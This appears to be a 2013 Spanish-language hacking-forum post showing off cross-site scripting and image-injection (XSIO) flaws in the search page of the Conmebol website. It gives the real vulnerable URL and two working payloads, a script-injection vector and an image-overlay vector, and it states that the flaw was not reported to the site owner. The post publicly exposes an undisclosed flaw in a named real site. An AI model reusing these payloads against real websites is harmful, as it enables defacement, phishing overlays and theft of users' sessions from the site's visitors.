Imprimir Página - [XSS] & [XSIO] Conmebol

Título: [XSS] & [XSIO] Conmebol
Publicado por: Hu0r en Febrero 19, 2013, 04:27:00 PM

Pude percatarme que la página web de la Conmebol es vulnerable a XSS y a XSIO (y de seguro a un montón de otras):

XSS

(http://i49.tinypic.com/35n4vma.png)

Url: http://www.conmebol.com/resultados.html?page=1&size=20&search= (http://www.conmebol.com/resultados.html?page=1&size=20&search=)
Vector: "/><script>alert(String.fromCharCode(104,117,048,114,032,085,110,100,101,114,099,048,100,101))</script>

XSIO

(http://i45.tinypic.com/35n25vk.png)

Url: http://www.conmebol.com/resultados.html?page=1&size=20&search= (http://www.conmebol.com/resultados.html?page=1&size=20&search=)
Vector: "><img src='http://underc0de.org/foro/Themes/underc0de/images/theme/logo.png' style='position:absolute;left:50px;top:0px;'/>

------------------

Reportado: NO

Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Hu0r en Febrero 19, 2013, 04:27:00 PM